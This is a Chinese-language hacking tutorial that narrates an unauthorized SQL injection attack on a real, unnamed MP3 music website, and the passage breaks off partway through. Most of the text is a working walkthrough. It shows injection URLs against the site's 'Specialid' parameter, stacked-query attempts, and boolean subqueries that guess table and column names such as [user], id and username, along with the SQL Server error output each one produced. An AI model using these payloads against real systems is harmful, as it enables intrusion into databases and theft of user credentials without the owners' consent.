SQL Injection的深入探讨分析和总结.docx

有孔就入 SQL Injection 的深入探讨 SQL Injection 这个话题越来越热了，很多的论坛和 hack 站点都或多或少地在谈论这个问题，当然也有很多革命前辈写了 N 多的关于这方面的文章，所利用的也是许多知名的程序，比如动网，尘缘雅境，而我们也可以拿到免费的程序来看其中的漏洞和数据库的结构，从中来达到注入的目的，不过如果是别人自己写的程序，那么我们就不知道他的源代码，更不知道他的数据库结构（数据表名和其中的字段名），就算有个变量未过滤提交到数据库去，我们也是无从对其下手的，只能利用通过猜解他的数据库结构来构造相应的 SQL 语句，那么是不是就到此为止，能猜到多少是多少呢？没有做不到的，只有想不到的，我相信这篇文章对研究 SQL Injection 朋友来说，应该会有所启发。 一、发现漏洞，常规注入 最近帮我们的站增加音乐，虽然本地的电信的音乐资源库非常丰富，但是缺少有关歌手和专辑的资料，所以到网上去闲逛找点有用的图片和歌手简介，通过百度搜索到了一个 mp3 的音乐超市，里面的资料还是比较丰富的，拷贝的同时顺手在他的 Specialid=1817 后面加了一个（单引号），我突然眼前一亮： Microsoft OLE DB Provider for SQL Server 错误 80040e14 Microsoft OLE DB Provider for SQL Server 错误 80040e14 字符串 之前有未闭合的引号。 /showspecial.asp，行 13 Specialid 没有过滤掉单引号就直接用到 SQL 语句中去了，而且是 SQL SERVER 版本的，漏洞的可利用性极大，可不能就此放过这么好的练兵机会，接着换;（分号）提交进去，居然页面正常出来了，说明该变量也没有过滤掉;号， 到这里，我们就可以对此进行 SQL 渗透了，按照常规的步骤： 1、提交http://********/showspecial.asp?Specialid=1817;usemaster;-- 注：--的作用是注释掉程序中后面的 SQL 语句，以防对我们构造的语句有影响，比如 order by.. 出现 Microsoft OLE DB Provider for SQL Server 错误 80040e21 Microsoft OLE DB Provider for SQL Server 错误 80040e21 多步 OLE DB 操作产生错误。如果可能，请检查每个 OLE DB 状态值。没有工作被完成。 /showspecial.asp，行 13 想在他的数据库里增加一个管理员是不可能了，我们再换一种方法 2、提交 http://********/showspecial.asp?Specialid=1817 and 1(select count(id) from [user]) 这一句的意思是猜猜看是不是存在一个名为 user 的表和他里面有没有 id 这个字段 一般来说: 如果不存在该表的话，会出现 Microsoft OLE DB Provider for SQL Server 错误 80040e37 Microsoft OLE DB Provider for SQL Server 错误 80040e37 对象名 user 无效。 /showspecial.asp，行 13 不存在该字段的话，会出现 Microsoft OLE DB Provider for SQL Server 错误 80040e14 Microsoft OLE DB Provider for SQL Server 错误 80040e14 列名 id 无效。 /showspecial.asp，行 13 注：一般来说，第一步是猜一些公共的表，这里所指的公共表的意思是大多数的程序员在写设计数据库结构的时候会用到的常用的表和字段，比如新闻的news 表中的编号字段 id，标题字段title，用户表user 或者 user_data 中的编号字段 id，用户名字段 username，当然你也可以在该站点的登陆界面看他的原代码，找到用户名和密码的表单的 name 值，那个也经常会是表字段名的真实值， 如INPUT type=text name=username size=15 很幸运，果然存在 user 表和 id 字段 3、通过提交 http://********/showspecial.asp?Specialid=1817 and 1(select count(username) from [user]) 这里的 username 是根据登陆框的表单名去猜的，恰好存在该字段。于是在该站注册了一个用户名为 rrrrr 的用户，作为注入的平台，得到我的用户